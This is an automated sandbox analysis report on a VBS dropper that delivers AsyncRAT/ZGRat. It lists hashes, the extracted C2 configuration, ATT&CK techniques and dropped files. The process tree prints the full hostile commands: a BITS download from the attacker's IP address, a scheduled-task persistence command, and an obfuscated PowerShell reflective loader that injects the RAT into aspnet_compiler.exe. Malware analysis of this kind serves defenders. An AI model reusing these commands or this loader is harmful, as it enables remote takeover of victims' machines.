asyncrat | cc810f437d25ad3ba039f7007f3e7b96826d1d96d470a7f3371ddd17ac888f28

Analysis

max time kernel
147s
max time network
157s
platform
windows10-2004_x64
resource
win10v2004-20231215-en
resource tags

arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system
submitted
04-01-2024 16:11

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

05012024_0011_g4.vbs
Size

731B
MD5

b0f5cedd7db682ffda4ce4968eac926d
SHA1

3200790fa2df151aace6a3454e167de2b89fad6e
SHA256

cc810f437d25ad3ba039f7007f3e7b96826d1d96d470a7f3371ddd17ac888f28
SHA512

7fe0f16adeb11eccd10955114451356b68a8dd61c79d606aeb435ecdacd87e5dfc0c6dfefe47bd234cb398a2158440001829ef772226323616fb5a8b2c5d72c3

Score

10^/10

asyncrat zgrat dox_2024 rat

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://104.243.44.136:666/moh.jpg

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://nodejs.org/download/release/v6.17.1/win-x64/node.exe

Extracted

Family

asyncrat

Version

AWS | 3Losh

Botnet

DOX_2024

w3llsfarg0h0st.ddns.net:2244

Mutex

AsyncMutex_doxfofikdw32

Attributes

delay
3
install
false
install_folder
%AppData%

aes.plain

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat

Detect ZGRat V1 1 IoCs

resource	yara_rule
behavioral2/memory/3360-111-0x000001F4D56B0000-0x000001F4D5702000-memory.dmp	family_zgrat_v1

ZGRat
ZGRat is remote access trojan written in C#.
rat zgrat

Async RAT payload 1 IoCs

rat

resource	yara_rule
behavioral2/memory/3320-112-0x0000000000400000-0x0000000000416000-memory.dmp	asyncrat

Downloads MZ/PE file

Checks computer location settings 2 TTPs 6 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-983843758-932321429-1636175382-1000\Control Panel\International\Geo\Nation	cmd.exe
Key value queried	\REGISTRY\USER\S-1-5-21-983843758-932321429-1636175382-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-983843758-932321429-1636175382-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-983843758-932321429-1636175382-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-983843758-932321429-1636175382-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-983843758-932321429-1636175382-1000\Control Panel\International\Geo\Nation	WScript.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 3360 set thread context of 3320	3360	powershell.exe	119

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Modifies registry class 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-983843758-932321429-1636175382-1000_Classes\Local Settings	WScript.exe
Key created	\REGISTRY\USER\S-1-5-21-983843758-932321429-1636175382-1000_Classes\Local Settings	cmd.exe

Suspicious behavior: EnumeratesProcesses 23 IoCs

pid	Process
1420	powershell.exe
1420	powershell.exe
216	powershell.exe
216	powershell.exe
216	powershell.exe
2552	powershell.exe
2552	powershell.exe
2552	powershell.exe
2872	node.exe
2872	node.exe
4560	node.exe
4560	node.exe
3360	powershell.exe
3360	powershell.exe
3360	powershell.exe
3360	powershell.exe
3360	powershell.exe
3360	powershell.exe
3320	aspnet_compiler.exe
3320	aspnet_compiler.exe
3632	node.exe
3632	node.exe
4380	powershell.exe

Suspicious use of AdjustPrivilegeToken 6 IoCs

description	pid	Process
Token: SeDebugPrivilege	1420	powershell.exe
Token: SeDebugPrivilege	216	powershell.exe
Token: SeDebugPrivilege	2552	powershell.exe
Token: SeDebugPrivilege	3360	powershell.exe
Token: SeDebugPrivilege	3320	aspnet_compiler.exe
Token: SeDebugPrivilege	4380	powershell.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
3320	aspnet_compiler.exe

Suspicious use of WriteProcessMemory 39 IoCs

description	pid	Process	procid_target
PID 2468 wrote to memory of 1420	2468	WScript.exe	26
PID 2468 wrote to memory of 1420	2468	WScript.exe	26
PID 2468 wrote to memory of 2628	2468	WScript.exe	98
PID 2468 wrote to memory of 2628	2468	WScript.exe	98
PID 2628 wrote to memory of 4756	2628	WScript.exe	101
PID 2628 wrote to memory of 4756	2628	WScript.exe	101
PID 4756 wrote to memory of 216	4756	cmd.exe	100
PID 4756 wrote to memory of 216	4756	cmd.exe	100
PID 4756 wrote to memory of 2552	4756	cmd.exe	106
PID 4756 wrote to memory of 2552	4756	cmd.exe	106
PID 4756 wrote to memory of 1588	4756	cmd.exe	108
PID 4756 wrote to memory of 1588	4756	cmd.exe	108
PID 4756 wrote to memory of 3416	4756	cmd.exe	110
PID 4756 wrote to memory of 3416	4756	cmd.exe	110
PID 1588 wrote to memory of 2872	1588	WScript.exe	111
PID 1588 wrote to memory of 2872	1588	WScript.exe	111
PID 3416 wrote to memory of 4560	3416	WScript.exe	112
PID 3416 wrote to memory of 4560	3416	WScript.exe	112
PID 4560 wrote to memory of 3076	4560	node.exe	115
PID 4560 wrote to memory of 3076	4560	node.exe	115
PID 3076 wrote to memory of 3360	3076	cmd.exe	116
PID 3076 wrote to memory of 3360	3076	cmd.exe	116
PID 3360 wrote to memory of 4880	3360	powershell.exe	118
PID 3360 wrote to memory of 4880	3360	powershell.exe	118
PID 3360 wrote to memory of 4880	3360	powershell.exe	118
PID 3360 wrote to memory of 3320	3360	powershell.exe	119
PID 3360 wrote to memory of 3320	3360	powershell.exe	119
PID 3360 wrote to memory of 3320	3360	powershell.exe	119
PID 3360 wrote to memory of 3320	3360	powershell.exe	119
PID 3360 wrote to memory of 3320	3360	powershell.exe	119
PID 3360 wrote to memory of 3320	3360	powershell.exe	119
PID 3360 wrote to memory of 3320	3360	powershell.exe	119
PID 3360 wrote to memory of 3320	3360	powershell.exe	119
PID 4940 wrote to memory of 3632	4940	WScript.exe	128
PID 4940 wrote to memory of 3632	4940	WScript.exe	128
PID 3632 wrote to memory of 1432	3632	node.exe	130
PID 3632 wrote to memory of 1432	3632	node.exe	130
PID 1432 wrote to memory of 4380	1432	cmd.exe	131
PID 1432 wrote to memory of 4380	1432	cmd.exe	131

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\05012024_0011_g4.vbs"
1⤵
- Checks computer location settings
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:2468
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Start-BitsTransfer -Source 'http://104.243.44.136:666/moh.jpg' -Destination 'C:\Users\Public\ben.zip'; Expand-Archive -Path 'C:\Users\Public\ben.zip' -DestinationPath 'C:\Users\Public\' -Force
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1420
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Public\basta.js"
  2⤵
  - Checks computer location settings
  - Suspicious use of WriteProcessMemory
  PID:2628
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Public\node.bat" C:\Users\Public\"
    3⤵
    - Checks computer location settings
    - Modifies registry class
    - Suspicious use of WriteProcessMemory
    PID:4756
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      PowerShell -Command "$tr = New-Object -ComObject Schedule.Service; $tr.Connect(); $ta = $tr.NewTask(0); $ta.RegistrationInfo.Description = 'Runs a script every 2 minutes'; $ta.Settings.Enabled = $true; $ta.Settings.DisallowStartIfOnBatteries = $false; $st = $ta.Triggers.Create(1); $st.StartBoundary = [DateTime]::Now.ToString('yyyy-MM-ddTHH:mm:ss'); $st.Repetition.Interval = 'PT2M'; $md = $ta.Actions.Create(0); $md.Path = 'C:\\Users\\Public\\app.js'; $ns = $tr.GetFolder('\'); $ns.RegisterTaskDefinition('BTime', $ta, 6, $null, $null, 3);"
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2552
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Public\shell.js"
      4⤵
      Checks computer location settings
      Suspicious use of WriteProcessMemory
      PID:1588
    - - C:\Users\Public\node.exe
        
        "C:\Users\Public\node.exe" C:\Users\Public\install.js
        5⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:2872
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Public\app.js"
      4⤵
      Checks computer location settings
      Suspicious use of WriteProcessMemory
      PID:3416
    - - C:\Users\Public\node.exe
        
        "C:\Users\Public\node.exe" C:\Users\Public\run.js
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of WriteProcessMemory
        
        PID:4560
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /s /c "powershell.exe -Command "Function OF([String] $gswt5) {$JS = [System.Collections.Generic.List[Byte]]::new();for ($i = 0; $i -lt $gswt5.Length; $i +=8) {$JS.Add([Convert]::ToByte($gswt5.Substring($i, 8), 2));}return [System.Text.Encoding]::ASCII.GetString($JS.ToArray());}Function User {param($x3losh)$x3losh = $x3losh -split '(..)' | ? { $_ };ForEach ($JSEYHESSS325 in $x3losh){[Convert]::ToInt32($JSEYHESSS325,16);}}$gswt5 = (Get-Content -Path 'C:\Users\Public\msg.dll' -Raw) -replace '%','0' -replace '!','1' -replace '@','A';$eyaw = (Get-Content -Path 'C:\Users\Public\runpe.dll' -Raw) -replace '%','0' -replace '!','1' -replace '@','A';$awayz = (Get-Content -Path 'C:\Users\Public\load.dll');$type = (Get-Content -Path 'C:\Users\Public\type.dll');$aeuyu = OF(Get-Content -Path 'C:\Users\Public\xx.dll');$eyksw = (Get-Content -Path 'C:\Users\Public\method.dll');$eeyuki = OF(Get-Content -Path 'C:\Users\Public\Execute.dll');$invoke = (Get-Content -Path 'C:\Users\Public\invoke.dll');$Framework = OF(Get-Content -Path 'C:\Users\Public\Framework.dll');$i = 0;while ($true) {; try {;[Byte[]]$JR = User $gswt5;[Byte[]]$YJSWU = User $eyaw; break; } catch {; };};[Reflection.Assembly]::$awayz($YJSWU).$type($aeuyu).$eyksw($eeyuki).$invoke($null,[object[]] ($Framework,$null,$JR,$true)); & Stop-Process -Name 'node'""
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:3076
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -Command "Function OF([String] $gswt5) {$JS = [System.Collections.Generic.List[Byte]]::new();for ($i = 0; $i -lt $gswt5.Length; $i +=8) {$JS.Add([Convert]::ToByte($gswt5.Substring($i, 8), 2));}return [System.Text.Encoding]::ASCII.GetString($JS.ToArray());}Function User {param($x3losh)$x3losh = $x3losh -split '(..)' | ? { $_ };ForEach ($JSEYHESSS325 in $x3losh){[Convert]::ToInt32($JSEYHESSS325,16);}}$gswt5 = (Get-Content -Path 'C:\Users\Public\msg.dll' -Raw) -replace '%','0' -replace '!','1' -replace '@','A';$eyaw = (Get-Content -Path 'C:\Users\Public\runpe.dll' -Raw) -replace '%','0' -replace '!','1' -replace '@','A';$awayz = (Get-Content -Path 'C:\Users\Public\load.dll');$type = (Get-Content -Path 'C:\Users\Public\type.dll');$aeuyu = OF(Get-Content -Path 'C:\Users\Public\xx.dll');$eyksw = (Get-Content -Path 'C:\Users\Public\method.dll');$eeyuki = OF(Get-Content -Path 'C:\Users\Public\Execute.dll');$invoke = (Get-Content -Path 'C:\Users\Public\invoke.dll');$Framework = OF(Get-Content -Path 'C:\Users\Public\Framework.dll');$i = 0;while ($true) {; try {;[Byte[]]$JR = User $gswt5;[Byte[]]$YJSWU = User $eyaw; break; } catch {; };};[Reflection.Assembly]::$awayz($YJSWU).$type($aeuyu).$eyksw($eeyuki).$invoke($null,[object[]] ($Framework,$null,$JR,$true)); & Stop-Process -Name 'node'"
        7⤵
        Suspicious use of SetThreadContext
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:3360
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
        8⤵
        
        PID:4880
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
        8⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of SetWindowsHookEx
        
        PID:3320

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PowerShell -Command "Start-BitsTransfer -Source 'https://nodejs.org/download/release/v6.17.1/win-x64/node.exe' -Destination 'C:\Users\Public\node.exe'"
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:216

C:\Windows\System32\WScript.exe
C:\Windows\System32\WScript.exe "C:\\Users\\Public\\app.js"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4940
- C:\Users\Public\node.exe
  "C:\Users\Public\node.exe" C:\Users\Public\run.js
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  PID:3632
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /s /c "powershell.exe -Command "Function OF([String] $gswt5) {$JS = [System.Collections.Generic.List[Byte]]::new();for ($i = 0; $i -lt $gswt5.Length; $i +=8) {$JS.Add([Convert]::ToByte($gswt5.Substring($i, 8), 2));}return [System.Text.Encoding]::ASCII.GetString($JS.ToArray());}Function User {param($x3losh)$x3losh = $x3losh -split '(..)' | ? { $_ };ForEach ($JSEYHESSS325 in $x3losh){[Convert]::ToInt32($JSEYHESSS325,16);}}$gswt5 = (Get-Content -Path 'C:\Users\Public\msg.dll' -Raw) -replace '%','0' -replace '!','1' -replace '@','A';$eyaw = (Get-Content -Path 'C:\Users\Public\runpe.dll' -Raw) -replace '%','0' -replace '!','1' -replace '@','A';$awayz = (Get-Content -Path 'C:\Users\Public\load.dll');$type = (Get-Content -Path 'C:\Users\Public\type.dll');$aeuyu = OF(Get-Content -Path 'C:\Users\Public\xx.dll');$eyksw = (Get-Content -Path 'C:\Users\Public\method.dll');$eeyuki = OF(Get-Content -Path 'C:\Users\Public\Execute.dll');$invoke = (Get-Content -Path 'C:\Users\Public\invoke.dll');$Framework = OF(Get-Content -Path 'C:\Users\Public\Framework.dll');$i = 0;while ($true) {; try {;[Byte[]]$JR = User $gswt5;[Byte[]]$YJSWU = User $eyaw; break; } catch {; };};[Reflection.Assembly]::$awayz($YJSWU).$type($aeuyu).$eyksw($eeyuki).$invoke($null,[object[]] ($Framework,$null,$JR,$true)); & Stop-Process -Name 'node'""
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1432
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -Command "Function OF([String] $gswt5) {$JS = [System.Collections.Generic.List[Byte]]::new();for ($i = 0; $i -lt $gswt5.Length; $i +=8) {$JS.Add([Convert]::ToByte($gswt5.Substring($i, 8), 2));}return [System.Text.Encoding]::ASCII.GetString($JS.ToArray());}Function User {param($x3losh)$x3losh = $x3losh -split '(..)' | ? { $_ };ForEach ($JSEYHESSS325 in $x3losh){[Convert]::ToInt32($JSEYHESSS325,16);}}$gswt5 = (Get-Content -Path 'C:\Users\Public\msg.dll' -Raw) -replace '%','0' -replace '!','1' -replace '@','A';$eyaw = (Get-Content -Path 'C:\Users\Public\runpe.dll' -Raw) -replace '%','0' -replace '!','1' -replace '@','A';$awayz = (Get-Content -Path 'C:\Users\Public\load.dll');$type = (Get-Content -Path 'C:\Users\Public\type.dll');$aeuyu = OF(Get-Content -Path 'C:\Users\Public\xx.dll');$eyksw = (Get-Content -Path 'C:\Users\Public\method.dll');$eeyuki = OF(Get-Content -Path 'C:\Users\Public\Execute.dll');$invoke = (Get-Content -Path 'C:\Users\Public\invoke.dll');$Framework = OF(Get-Content -Path 'C:\Users\Public\Framework.dll');$i = 0;while ($true) {; try {;[Byte[]]$JR = User $gswt5;[Byte[]]$YJSWU = User $eyaw; break; } catch {; };};[Reflection.Assembly]::$awayz($YJSWU).$type($aeuyu).$eyksw($eeyuki).$invoke($null,[object[]] ($Framework,$null,$JR,$true)); & Stop-Process -Name 'node'"
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4380

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
e5ab5d093e49058a43f45f317b401e68

SHA1
120da069a87aa9507d2b66c07e368753d3061c2d

SHA256
4ec6d8e92ffc5b2a0db420e2d031a2226eef582d5e56d5088fc91bba77288e74

SHA512
d44361457713abd28c49f9aa4043b76882e2b5e626816267cf3d79454c48980ba6207333f23b7976b714e090c658db36a844cb27cd6a91615014f3b06ef5623a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
44f6aff097b72924e76847981e19d68b

SHA1
e9eebe125cd8045710a86a9ddadb1219544eb92c

SHA256
5f11e933f921d6ed308e6c62fd5a9e092a9db28c923f06f2b8b7c8ce24189d82

SHA512
3a9e90c0bd50e1d3eb636dcfe0e7342ff96a138da8fb671ae5fafb8bbd219f47d812f8b21c002d17aef7d69e09613fe41f69d8ff1043156db062d42a4e75d406

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
cae007a0b1907e0a465988d6cf3d4ae1

SHA1
2959ede7ba9ce4e63f39c9e8ee13349c9a65de09

SHA256
3a3b450632d06756c84ee4eaad2547d811a3e6f17ae03e3285cbee8032efc751

SHA512
92f1bd0b78f91b1cc61b80848f4061981d7c451a4c74e29a85b7f26e03b4493a122602a43a8d50cddb7f90b5564cfe9fc4b10933bcd3bcbd802a7b3754923c38

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
2KB

MD5
176e06d925350cd4e4fe35470be810d9

SHA1
60e4033d866f64faa490dad93552ec221a7c3db9

SHA256
1db23e1c00caceb52423a6e78b3923eb6cbde8fc9c5ca86ae88b717a433ddbb4

SHA512
6f661ba92185d85329b119944ec5098bb0b05d2c00ed3353b5a21639caef921033634706083fe7b7a8d09a65d71b7f4e9d07b4f33740a30d38ef6b7fc21d50b1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
9121da979658c2bfa10339a84dfe9fc2

SHA1
4b18051e5d56d2d48e10ea76725eb8a14682657b

SHA256
e503500d8ff61da3288985cdd3fa6d9d166604a4a30c81ecb66d091fef015d30

SHA512
9175734024759173777aebb1ee0b7e39475e36c6bf249486b82aa42b063dfe5971be76bee3e02911971ae00692ee904f6dfedd23c5d446480913fd254226d5b4

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_kcawoeeu.stx.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Public\Execute.dll

Filesize
56B

MD5
529cf04db0f736467c7583ea80c3aa66

SHA1
7628148337b1d3d700c8151f76a1595b6f5123b8

SHA256
67642e56281bc4aa846689bc725f8fcc76e61c20831aa4f7e2e0c8cdba17e520

SHA512
f612b12e1a7c2021f6c2723fe57f23aba3d1b6588f080dd67e48dc44eeaf88455e4bc6bf9caed088c63c3fb019ad8696eeb44e7bb09f8c81638779f4658ef6d4

Download Submit
C:\Users\Public\Framework.dll

Filesize
520B

MD5
6a08392ecf95df7fc91917dcfaae8da6

SHA1
480f6a5c761e1a069c0d68f5ac2aabf727791393

SHA256
0a572ee5508d9310936801a04237d56f118dff4dbaa98f60070988cc4b8ca460

SHA512
d70c436183a9c6f6d4ce9296dce846f94cd12d7fbb76b24e59d88a77349a95a7a0d6ad8f9f4ffc32a98618b3250e0d35e4cf9ff1e711f4e63ffee425597dfc5e

Download Submit
C:\Users\Public\app.js

Filesize
385B

MD5
08a7e6db996774b6806c395c04116803

SHA1
d0182c34dacc8ab9c8841c8913a1ae7f4d281595

SHA256
9268b265b1de1e39454bc0276b85e56e3e1763526a972bfc60a3bbb533192bdc

SHA512
d3191ac299738e2b01edda769da6462df9f292bfe033cc26aeb317d47e04948d56e52eeef19c1d82c31e8f213c7547504e42f354c4c417b9e17aec7c6154e43b

Download Submit
C:\Users\Public\basta.js

Filesize
377B

MD5
38affda935585ad2ddc0abe0a906f404

SHA1
8379070ec3e9b448499c53c6244c815bc566cf59

SHA256
f1c6fbb11607690d7de83308bb65b7fdd0679591c2fc5bc927820b654a483eaa

SHA512
0520a8d53a2bc686a87c530680afa2f12eab198316e3d7419f472515bac0b0d2a3c891b0e4f3112b1f382d799f4655aa06624c57f06c2bc1cc3161ff06aeced6

Download Submit
C:\Users\Public\invoke.dll

Filesize
6B

MD5
b9376e9e3c4d48f5e35a3f355ae1f74a

SHA1
c65605adf5270f5065089b0189da542274d30db0

SHA256
90092e5fb861dd4ff34fa20f4b31ca44ebbb3bc367a8d7a35b89a7f89c793fa9

SHA512
5560101edb289c4a86476bce55648324ef188ff1e2d879a1a3bc10c1298aa643255c35d16a984f30d624fe9a87306304eaa14179863001ddd6e264e8bba17591

Download Submit
C:\Users\Public\load.dll

Filesize
4B

MD5
f19dbf2edb3a0bd74b0524d960ff21eb

SHA1
ddcb77ff769ea54ca622848f6bedd4004fa4f4fa

SHA256
8a6bdb6b18da586fe7f2acbd8f1055533f2cd97a3681b3652bcd712224df45c3

SHA512
f0419117db6330f52eba6e7ef08a5cb096fdb02a40b1dfe4f28dd57791a11b6753e4db0fb63e1c4a22293584dc61908a8e2e99dc59a07f805e097c723329d216

Download Submit
C:\Users\Public\method.dll

Filesize
9B

MD5
38b97710070dbdd7b3359c0d52da4a72

SHA1
4ce08d2147c514f9c8e1f83d384369ec8986bc3b

SHA256
675f06af4e7f254d55ac605bbd7da45d9e00207a97f8a8ab7bb747d512776bc7

SHA512
b11cec0f21dec871163d6c254850d3f807ecc4ae726b143a0c4667a25c3a3fe9283aee3f6850a2389fdce3d20f41d9c3d30f4768171137d6bdc1355a2116189c

Download Submit
C:\Users\Public\msg.dll

Filesize
123KB

MD5
55a2ab1987b5dc68a293d870ff989008

SHA1
e170596b7a86e216f23f9e0187e460447f63a88f

SHA256
c80df95873d89cfe623decf1e71a7b53afd7771ddf97256e59c1a848253fbb64

SHA512
ccdfe15c5daab738a889e6405a1c6daf76bcaeb651e04fa9d148b5078707c4ba2c56f8b540227d61bfda4c93b0b33487becb29c7916ac03d8c48ac0e9970e5e4

Download Submit
C:\Users\Public\node.bat

Filesize
3KB

MD5
f6a91f8aa7612ef8d9f2887fd909600a

SHA1
948ac8197a43a5e50ed34241f3d74bba0222b9c7

SHA256
dd9a0df1cefd595c2b9a0cceb0a0042451b496d3c5753e2a33520de646c9ddf3

SHA512
666339156dd8924df33adc3e0a266d2048f0e9b9ef201cedfe304ae37c99a45674abd4bf97a94ea3eb81e5d7a98f399d9770cad5dca16bf5852a692460d855ef

Download Submit
C:\Users\Public\run.js

Filesize
1KB

MD5
166e57b73fd399b0f54c415d22b235f6

SHA1
f20bf715826dc97a5e26c7acc4310d32213cc2b7

SHA256
f7741744738c58c8cd5b1b8bc756860a68a8b3378576c421f0f597edf29f5df3

SHA512
e2a32241f607f0b6842ca2546002ad086035161249bd2dd3bf04a05dcbf6ad660ef91d23507c0f0c983769ade7d73d0b627b8c16c31954e607b4261b89979eda

Download Submit
C:\Users\Public\runpe.dll

Filesize
608KB

MD5
ab3151ce426cf5959813a90f452750b8

SHA1
271198005f634f22c0f84358a00b7aff302e712b

SHA256
a9e0964b0bcbd52e1344af7f25977128860f81eb3173fcdc8f00d448a6e6e578

SHA512
5ff0856cbfc649f89ae7e1997d819b2d6593a56c36758bf45f1e59ac74fe8599007b08752b76424f9eb540af87bc89c1fa58bbf81b9967fc3c6fff897ec0975b

Download Submit
C:\Users\Public\shell.js

Filesize
387B

MD5
3c93270c5a82e51379c4eaa91cd697d5

SHA1
250fb007cc2b58cb67bb8c4a8b9d6f2308cc78b7

SHA256
825858c8524555771bd602ce6a304e10144b5ec7b1f9249aef5aa5a667771e1c

SHA512
ee4a491f1c4cee10bbd15a5a1f26aa16af3b3e504cb9860904b3d21d82261d739c31adbaccda44cc6107d786f84ca2ad7eeeac64c5496a257ff3c04d435c960f

Download Submit
C:\Users\Public\type.dll

Filesize
7B

MD5
be784e48d0174367297b636456c7bcf1

SHA1
8c906d9e0e2439238b3263e087aee3d98fa86dea

SHA256
510760f4c6f7fb3b5b332cd7d3a2f674235b0f58d77dbc3972adaf682a168136

SHA512
aed58d8904742a672f9ba339069004a1c0339e6481a8949de14ee8bf2afef43f8e18e55ba4a6854a7950ee355675c26b46120e500472deaf0986f68451442ae4

Download Submit
C:\Users\Public\xx.dll

Filesize
72B

MD5
14c2a6b7bf15e15d8dae9cd4a56432d5

SHA1
0d00aa5d547ea7e6f7283221e5f3b0cc91cc6016

SHA256
79891821778c4ca9358c27e7fb66b0442a2921b661df1293e398b18d81da5d96

SHA512
e476851faf540c3679225de2b224d64d117fa1857a4db7b34714d0154b8ba5ebaab50e1a6b0578759b7572e89e3df4d0d4112a7e4f5b81230931cfe6b651c63d

Download Submit
memory/216-68-0x00007FFB87BF0000-0x00007FFB886B1000-memory.dmp

Filesize
10.8MB

Download
memory/216-64-0x00000270A0900000-0x00000270A0910000-memory.dmp

Filesize
64KB

Download
memory/216-63-0x00000270A0900000-0x00000270A0910000-memory.dmp

Filesize
64KB

Download
memory/216-65-0x00000270A0900000-0x00000270A0910000-memory.dmp

Filesize
64KB

Download
memory/216-62-0x00007FFB87BF0000-0x00007FFB886B1000-memory.dmp

Filesize
10.8MB

Download
memory/216-66-0x00000270A2AE0000-0x00000270A2B06000-memory.dmp

Filesize
152KB

Download
memory/1420-14-0x000002585B8C0000-0x000002585B8E6000-memory.dmp

Filesize
152KB

Download
memory/1420-16-0x000002585B930000-0x000002585B942000-memory.dmp

Filesize
72KB

Download
memory/1420-10-0x00007FFB87BF0000-0x00007FFB886B1000-memory.dmp

Filesize
10.8MB

Download
memory/1420-12-0x0000025859330000-0x0000025859340000-memory.dmp

Filesize
64KB

Download
memory/1420-0-0x00000258592F0000-0x0000025859312000-memory.dmp

Filesize
136KB

Download
memory/1420-48-0x00007FFB87BF0000-0x00007FFB886B1000-memory.dmp

Filesize
10.8MB

Download
memory/1420-13-0x0000025859330000-0x0000025859340000-memory.dmp

Filesize
64KB

Download
memory/1420-17-0x000002585B8F0000-0x000002585B8FA000-memory.dmp

Filesize
40KB

Download
memory/1420-11-0x0000025859330000-0x0000025859340000-memory.dmp

Filesize
64KB

Download
memory/1420-15-0x000002585B910000-0x000002585B924000-memory.dmp

Filesize
80KB

Download
memory/2552-83-0x00007FFB87BF0000-0x00007FFB886B1000-memory.dmp

Filesize
10.8MB

Download
memory/2552-76-0x000002DE77C70000-0x000002DE77C80000-memory.dmp

Filesize
64KB

Download
memory/2552-75-0x000002DE77C70000-0x000002DE77C80000-memory.dmp

Filesize
64KB

Download
memory/2552-74-0x00007FFB87BF0000-0x00007FFB886B1000-memory.dmp

Filesize
10.8MB

Download
memory/3320-116-0x0000000005080000-0x0000000005090000-memory.dmp

Filesize
64KB

Download
memory/3320-123-0x0000000006650000-0x00000000066B6000-memory.dmp

Filesize
408KB

Download
memory/3320-112-0x0000000000400000-0x0000000000416000-memory.dmp

Filesize
88KB

Download
memory/3320-125-0x0000000005080000-0x0000000005090000-memory.dmp

Filesize
64KB

Download
memory/3320-115-0x0000000075160000-0x0000000075910000-memory.dmp

Filesize
7.7MB

Download
memory/3320-124-0x0000000075160000-0x0000000075910000-memory.dmp

Filesize
7.7MB

Download
memory/3320-117-0x0000000005AE0000-0x0000000006084000-memory.dmp

Filesize
5.6MB

Download
memory/3320-118-0x0000000005710000-0x00000000057A2000-memory.dmp

Filesize
584KB

Download
memory/3320-119-0x0000000005700000-0x000000000570A000-memory.dmp

Filesize
40KB

Download
memory/3320-122-0x00000000065B0000-0x000000000664C000-memory.dmp

Filesize
624KB

Download
memory/3360-91-0x000001F4D30C0000-0x000001F4D30D0000-memory.dmp

Filesize
64KB

Download
memory/3360-111-0x000001F4D56B0000-0x000001F4D5702000-memory.dmp

Filesize
328KB

Download
